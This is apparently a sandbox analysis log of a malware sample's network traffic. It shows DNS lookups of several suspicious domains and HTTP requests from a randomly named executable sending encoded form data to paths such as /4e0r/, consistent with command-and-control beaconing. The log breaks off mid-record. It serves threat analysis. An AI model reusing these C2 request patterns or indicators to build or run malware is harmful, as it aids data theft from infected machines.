Jan 11, 2025 00:08:16.172821999 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172837019 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172851086 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172866106 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172879934 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172893047 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172908068 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172923088 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.172945023 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.172981977 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.179786921 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.179924965 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.179939032 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.179972887 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.180389881 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.180485010 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.391418934 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391458988 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391530991 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391566038 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391602039 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391635895 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391671896 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391670942 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.391709089 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.391709089 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.391876936 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391921997 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.391931057 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.391967058 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.392002106 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.392015934 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.392056942 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.392086029 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:16.392105103 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.392138958 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.396071911 CET	50005	80	192.168.2.6	103.249.106.91
Jan 11, 2025 00:08:16.403987885 CET	80	50005	103.249.106.91	192.168.2.6
Jan 11, 2025 00:08:18.181642056 CET	80	49999	13.248.169.48	192.168.2.6
Jan 11, 2025 00:08:18.181793928 CET	49999	80	192.168.2.6	13.248.169.48
Jan 11, 2025 00:08:21.430824041 CET	50006	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:21.435667038 CET	80	50006	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:21.435781002 CET	50006	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:21.456264019 CET	50006	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:21.461234093 CET	80	50006	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:22.034720898 CET	80	50006	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:22.034785986 CET	80	50006	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:22.034852028 CET	50006	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:22.969839096 CET	50006	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:23.988656044 CET	50007	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:23.993702888 CET	80	50007	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:23.993906021 CET	50007	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:24.008925915 CET	50007	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:24.013921022 CET	80	50007	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:24.605345011 CET	80	50007	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:24.605382919 CET	80	50007	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:24.605606079 CET	50007	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:25.516788960 CET	50007	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:26.535621881 CET	50008	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:26.543427944 CET	80	50008	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:26.543667078 CET	50008	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:26.558250904 CET	50008	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:26.563235998 CET	80	50008	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:26.563361883 CET	80	50008	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:27.180089951 CET	80	50008	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:27.180139065 CET	80	50008	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:27.180214882 CET	50008	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:28.063585043 CET	50008	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:29.082417965 CET	50009	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:29.087539911 CET	80	50009	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:29.087658882 CET	50009	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:29.096760035 CET	50009	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:29.101650953 CET	80	50009	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:29.676487923 CET	80	50009	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:29.676515102 CET	80	50009	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:29.676763058 CET	50009	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:29.679516077 CET	50009	80	192.168.2.6	69.57.163.64
Jan 11, 2025 00:08:29.684338093 CET	80	50009	69.57.163.64	192.168.2.6
Jan 11, 2025 00:08:34.994864941 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:34.999687910 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:34.999898911 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:35.014470100 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:35.019328117 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547056913 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547079086 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547095060 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547107935 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547126055 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547276020 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547323942 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:35.547323942 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:35.547339916 CET	80	50010	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:35.547385931 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:35.547385931 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:36.516599894 CET	50010	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:37.535598993 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:37.540502071 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:37.540585041 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:37.555145025 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:37.559906006 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.068587065 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.068643093 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.068675995 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.068710089 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.068705082 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:38.068746090 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.068761110 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:38.069361925 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.069418907 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:38.069468975 CET	80	50011	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:38.069530010 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:39.063549995 CET	50011	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.082413912 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.087407112 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.087501049 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.102344036 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.107234955 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.107394934 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.622778893 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.622827053 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.622865915 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.622900963 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.622939110 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.622952938 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.622952938 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.623091936 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.623166084 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:40.623225927 CET	80	50012	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:40.623281002 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:41.610371113 CET	50012	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:42.629676104 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:42.634572983 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:42.638714075 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:42.647763014 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:42.652621984 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185142994 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185158968 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185170889 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185184002 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185197115 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185210943 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185262918 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185275078 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185303926 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185317039 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185400009 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:43.185410976 CET	80	50013	173.208.249.155	192.168.2.6
Jan 11, 2025 00:08:43.185463905 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:43.185486078 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:43.190212011 CET	50013	80	192.168.2.6	173.208.249.155
Jan 11, 2025 00:08:43.195072889 CET	80	50013	173.208.249.155	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:07:11.495929956 CET	55262	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:07:11.508203983 CET	53	55262	1.1.1.1	192.168.2.6
Jan 11, 2025 00:07:27.239510059 CET	53696	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:07:27.670633078 CET	53	53696	1.1.1.1	192.168.2.6
Jan 11, 2025 00:07:40.817332029 CET	60883	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:07:40.844980001 CET	53	60883	1.1.1.1	192.168.2.6
Jan 11, 2025 00:07:54.192838907 CET	50785	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:07:54.258820057 CET	53	50785	1.1.1.1	192.168.2.6
Jan 11, 2025 00:08:07.410603046 CET	58077	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:08:07.445363998 CET	53	58077	1.1.1.1	192.168.2.6
Jan 11, 2025 00:08:21.411118984 CET	51522	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:08:21.428277969 CET	53	51522	1.1.1.1	192.168.2.6
Jan 11, 2025 00:08:34.699829102 CET	63524	53	192.168.2.6	1.1.1.1
Jan 11, 2025 00:08:34.989259958 CET	53	63524	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 00:07:11.495929956 CET	192.168.2.6	1.1.1.1	0xb168	Standard query (0)	www.topkapiescortg.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:27.239510059 CET	192.168.2.6	1.1.1.1	0xf807	Standard query (0)	www.dadu89.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.817332029 CET	192.168.2.6	1.1.1.1	0x36b6	Standard query (0)	www.masterqq.pro	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:54.192838907 CET	192.168.2.6	1.1.1.1	0xde06	Standard query (0)	www.shipley.group	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:08:07.410603046 CET	192.168.2.6	1.1.1.1	0xa692	Standard query (0)	www.8686206.xyz	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:08:21.411118984 CET	192.168.2.6	1.1.1.1	0xd72f	Standard query (0)	www.expertguide.info	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:08:34.699829102 CET	192.168.2.6	1.1.1.1	0xa2f8	Standard query (0)	www.growbamboo.xyz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:11.508203983 CET	1.1.1.1	192.168.2.6	0xb168	No error (0)	www.topkapiescortg.xyz		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:27.670633078 CET	1.1.1.1	192.168.2.6	0xf807	No error (0)	www.dadu89.org	dadu89.org		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:07:27.670633078 CET	1.1.1.1	192.168.2.6	0xf807	No error (0)	dadu89.org		64.46.102.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:40.844980001 CET	1.1.1.1	192.168.2.6	0x36b6	No error (0)	www.masterqq.pro		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:54.258820057 CET	1.1.1.1	192.168.2.6	0xde06	No error (0)	www.shipley.group		13.248.169.48	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:07:54.258820057 CET	1.1.1.1	192.168.2.6	0xde06	No error (0)	www.shipley.group		76.223.54.146	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:08:07.445363998 CET	1.1.1.1	192.168.2.6	0xa692	No error (0)	www.8686206.xyz		103.249.106.91	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:08:21.428277969 CET	1.1.1.1	192.168.2.6	0xd72f	No error (0)	www.expertguide.info		69.57.163.64	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:08:34.989259958 CET	1.1.1.1	192.168.2.6	0xa2f8	No error (0)	www.growbamboo.xyz	banajibazar.xyz		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:08:34.989259958 CET	1.1.1.1	192.168.2.6	0xa2f8	No error (0)	banajibazar.xyz		173.208.249.155	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.topkapiescortg.xyz

www.dadu89.org

www.masterqq.pro

www.shipley.group

www.8686206.xyz

www.expertguide.info

www.growbamboo.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49988	104.21.32.1	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:11.527493954 CET	502	OUT	GET /cz1i/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=lCWtxBlDPSCNJhR0+19OuJUUN4TPzQ9GmK+Kme085vCDtUrqSJqQP+UtwYINSw3lRTDSNZCzyCPLZyeariLfkns3ycLPJ7dd0goSQpwFZQaHlmzS5XOrg/IMpHLndMei1cnf+as= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.topkapiescortg.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Jan 11, 2025 00:07:12.188328028 CET	866	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0 Pragma: no-cache cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z7qHwblsEi8WR4waAnrRbwLU2ukd1wMJb7zx1WYtaLrgd0zK6wXqz%2BwzegMtMO%2BGpGYpEvuzNB5xW%2Bx7Oc0P9LkNZHO%2FqXvYFwybI4iuUnpOMHzdllEl6l4BtW2DvHLYarueILqvuTXL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900052678e978cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1796&rtt_var=898&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 00:07:12.189625025 CET	1236	IN	Data Raw: 34 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 Data Ascii: 4d5<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Ar
Jan 11, 2025 00:07:12.189645052 CET	19	IN	Data Raw: 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: /html>10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49989	64.46.102.238	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:27.693006039 CET	741	OUT	POST /4e0r/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dadu89.org Origin: http://www.dadu89.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 Cache-Control: max-age=0 Referer: http://www.dadu89.org/4e0r/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 64 52 54 58 2b 44 51 45 39 32 63 69 32 6a 37 67 6f 42 58 63 78 55 6b 70 43 6f 69 74 59 37 51 33 45 74 4e 6a 39 33 54 6c 67 46 4b 73 73 69 55 78 77 5a 55 76 2f 46 71 79 4c 48 2f 54 52 63 6e 6e 45 58 45 2b 6b 4a 31 65 75 2f 47 4e 66 72 59 47 65 61 52 57 65 36 79 44 34 4b 71 69 61 76 38 4a 6a 50 46 35 59 75 33 5a 64 53 6e 32 49 58 49 42 42 45 71 63 4d 6b 75 2f 5a 74 54 46 78 74 37 55 4a 57 47 2f 30 38 58 70 62 2b 36 37 66 44 51 66 71 6a 2f 7a 6d 2b 49 6e 38 75 50 69 71 4c 74 44 47 4e 4b 50 6a 41 42 6f 4a 49 6f 53 78 6c 52 46 54 59 4a 48 33 4c 63 73 6e 72 51 69 6f 6e 33 4e 6e 67 4b 77 6d 72 39 52 63 41 44 59 Data Ascii: kPJ4bZ=dRTX+DQE92ci2j7goBXcxUkpCoitY7Q3EtNj93TlgFKssiUxwZUv/FqyLH/TRcnnEXE+kJ1eu/GNfrYGeaRWe6yD4Kqiav8JjPF5Yu3ZdSn2IXIBBEqcMku/ZtTFxt7UJWG/08Xpb+67fDQfqj/zm+In8uPiqLtDGNKPjABoJIoSxlRFTYJH3LcsnrQion3NngKwmr9RcADY
Jan 11, 2025 00:07:28.128205061 CET	479	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:28 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49990	64.46.102.238	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:30.250699997 CET	765	OUT	POST /4e0r/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.dadu89.org Origin: http://www.dadu89.org Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 235 Cache-Control: max-age=0 Referer: http://www.dadu89.org/4e0r/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 64 52 54 58 2b 44 51 45 39 32 63 69 32 48 2f 67 37 53 2f 63 30 30 6b 71 4e 49 69 74 53 62 51 7a 45 74 52 6a 39 32 48 4d 67 7a 36 73 69 67 4d 78 78 64 41 76 79 6c 71 79 59 48 2f 53 4d 4d 6e 6f 45 58 34 63 6b 4e 70 65 75 2f 43 4e 66 72 49 47 66 70 35 56 4d 61 79 46 6d 71 71 6b 58 50 38 4a 6a 50 46 35 59 75 69 32 64 53 2f 32 49 6e 34 42 41 6d 43 62 4b 55 75 38 55 39 54 46 36 4e 37 51 4a 57 47 4e 30 35 50 58 62 38 53 37 66 44 67 66 72 32 44 30 2f 75 4a 73 32 4f 4f 4c 6e 49 49 71 4c 75 72 59 6f 42 31 79 63 4f 45 70 35 7a 4d 66 50 72 4a 6b 6c 62 38 75 6e 70 49 51 6f 48 33 6e 6c 67 79 77 30 38 78 32 54 30 6d 37 32 6f 62 79 79 68 78 68 43 4c 71 37 56 45 33 39 4d 32 68 33 45 41 3d 3d Data Ascii: 